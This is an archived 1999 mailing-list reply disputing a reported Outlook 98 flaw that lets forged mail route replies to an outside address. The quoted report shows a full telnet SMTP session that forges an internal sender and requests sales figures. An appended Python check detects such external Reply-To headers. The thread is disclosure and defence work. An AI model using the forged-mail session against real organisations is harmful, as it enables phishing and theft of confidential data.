Re: Outlook 98 allows spoofing internal users

From: Sebastian Schreiber (Sebastian.Schreiberat_private-TUEBINGEN.DE)
Date: Sun May 02 1999 - 12:41:39 PDT


    Hi Nate,
    
    I was not able to reproduce the exploit that you reported to the
    bugtraq mailing list. Outlook 98 did exactly what I expected: when I
    open the mail, I see the "From:"-header in the message. When I reply
    to the email, Outlook takes the "Reply-To:"-address of the
    header. Which version of Outlook did you test?
    
    Best Regards, Sebastian
    
    PS: your "quick script" has a little bug: the header entry should be
        "Reply-To:" instead of "Reply To:".
    
    
    Nate Lawson <nateat_private> wrote:
    > Problem: Outlook uses a sender's Reply-To address silently, allowing
    >          a user to inadvertently send data to an Internet mail account
    >          when intending to reply to an internal, trusted user.
    >
    > Impact: Anyone on the Internet can spoof a trusted internal Exchange user
    >         and get replies sent back to themselves without the user knowing they
    >         weren't responding to another internal user.
    >
    > How to reproduce:
    >
    > 1.  Spoof mail as an internal user with a Reply-To address claiming to be
    >     an internal user, but an address of an Internet account, say hotmail.
    > 2.  Go into Outlook and read the mail.  The mail looks like it was internally
    >     generated but viewing the full Internet headers under View->Options
    >     shows the bogus Reply-To header.
    > 3.  Hit Reply in Outlook.  The To: field looks like it's going to a valid
    >     internal user, but right clicking on it and choosing Properties shows
    >     that the internal user it is sending the reply to is actually an Internet
    >     address.
    > 4.  Enter some text and hit Send.  Observe that the mail went to the attacker's
    >     account, not the internal one.
    >
    > A quick script:
    >
    > {root 5:00pm} ~> telnet mail.example.com 25
    > Trying 10.20.2.5...
    > Connected to mail.example.com.
    > Escape character is '^]'.
    > 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
    > helo losebag
    > 250 OK
    > mail from:<>
    > 250 OK - mail from <>
    > rcpt to:<accountingat_private>
    > 250 OK - Recipient <accountingat_private>
    > data
    > 354 Send data.  End with CRLF.CRLF
    > From: Nate Lawson
    > To: Accounting
    > Reply To: Nate Lawson<intruderat_private>
    > Subject: important!
    >
    > Please reply with the latest copy of our sales figures!
    >
    > Thanks,
    > Nate
    > .
    > 250 OK
    > quit
    > 221 closing connection
    > Connection closed by foreign host.
    >
    > Now, a reply to the email will go not to the trusted internal user Nate
    > Lawson <nlawsonat_private> but to the attacker, <intruderat_private>.
    > Worse, the user sees no indication that the mail is outward-bound!  The
    > To: field on the reply simply shows "Nate Lawson", a valid internal user.
    >
    > Affected programs:  Only tested on Outlook 98
    >
    > Known use of this bug to get confidential information:  none yet
    >
    > Suggested Fix: always show the full email address of any recipient that is
    > not local (i.e. usernameat_private would be hidden but any instance of
    > userat_private would be shown)
    >
    > Microsoft has been notified, but claimed this was a weakness in SMTP and
    > would not be fixed until a secure successor to SMTP is implemented. They
    > obviously missed the point -- the error is not in that mail can be forged,
    > but that Outlook allows a user to respond to a message that looks local
    > and legitimate, but is actually destined for an outside address.
    >
    > -Nate
    
    --
    -- What's a letter?  Is it like E-mail?                ((o)(o))
    |---------------------------------------------------ooOo-(  )-oOoo-|
    | Sebastian Schreiber, Burgholzweg 36, 72070 Tübingen    (  )      |
    | Germany, Voice: ++49 (0)7071 49570                     (  )      |
    |          GSM: 0049-173-3502725                         (..)      |
    |------------------------------------------------------------------|
     Key fingerprint = 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98
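The check a mail client or gateway would need in order to implement the suggested fix above (show the full address of any reply recipient that is not local) can be written as follows. This is an added example, not code from either poster; the local domain, the sample messages and the external address are constructed assumptions, and the second sample reproduces the "Reply To:" spelling from the quoted script to show why it does not take effect.

```python
"""Where does a reply to this message actually go, and should the client
show the address? Added example; LOCAL_DOMAINS and samples are assumptions."""
from email import message_from_string
from email.utils import parseaddr

LOCAL_DOMAINS = {"example.com"}  # assumption: the site's own mail domain(s)


def reply_target(raw):
    """Return (display_name, address) a mail client would reply to.
    Reply-To, when present, takes precedence over From."""
    msg = message_from_string(raw)
    header = msg.get("Reply-To") or msg.get("From") or ""
    return parseaddr(header)


def is_local(addr):
    domain = addr.rpartition("@")[2].lower()
    return bool(domain) and domain in LOCAL_DOMAINS


def reply_leaves_site(raw):
    """True when a reply would be delivered outside the local domain."""
    _, addr = reply_target(raw)
    return bool(addr) and not is_local(addr)


def render_recipient(raw):
    """Recipient string for the reply window: the display name alone only
    for local users; name plus full address for anything external."""
    name, addr = reply_target(raw)
    if addr and not is_local(addr):
        return f"{name} <{addr}>" if name else addr
    return name or addr


# Constructed samples. SPOOFED mirrors the thread: a local-looking From with
# an external Reply-To. MISSPELT uses "Reply To:" with a space, which the
# parser does not accept as a header field, so the reply falls back to From.
SPOOFED = (
    "From: Nate Lawson <nlawson@example.com>\n"
    "Reply-To: Nate Lawson <intruder@attacker.example>\n"
    "Subject: important!\n\nPlease reply with the sales figures.\n"
)
MISSPELT = SPOOFED.replace("Reply-To:", "Reply To:")

if __name__ == "__main__":
    for raw in (SPOOFED, MISSPELT):
        print(render_recipient(raw), "| leaves site:", reply_leaves_site(raw))
```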
    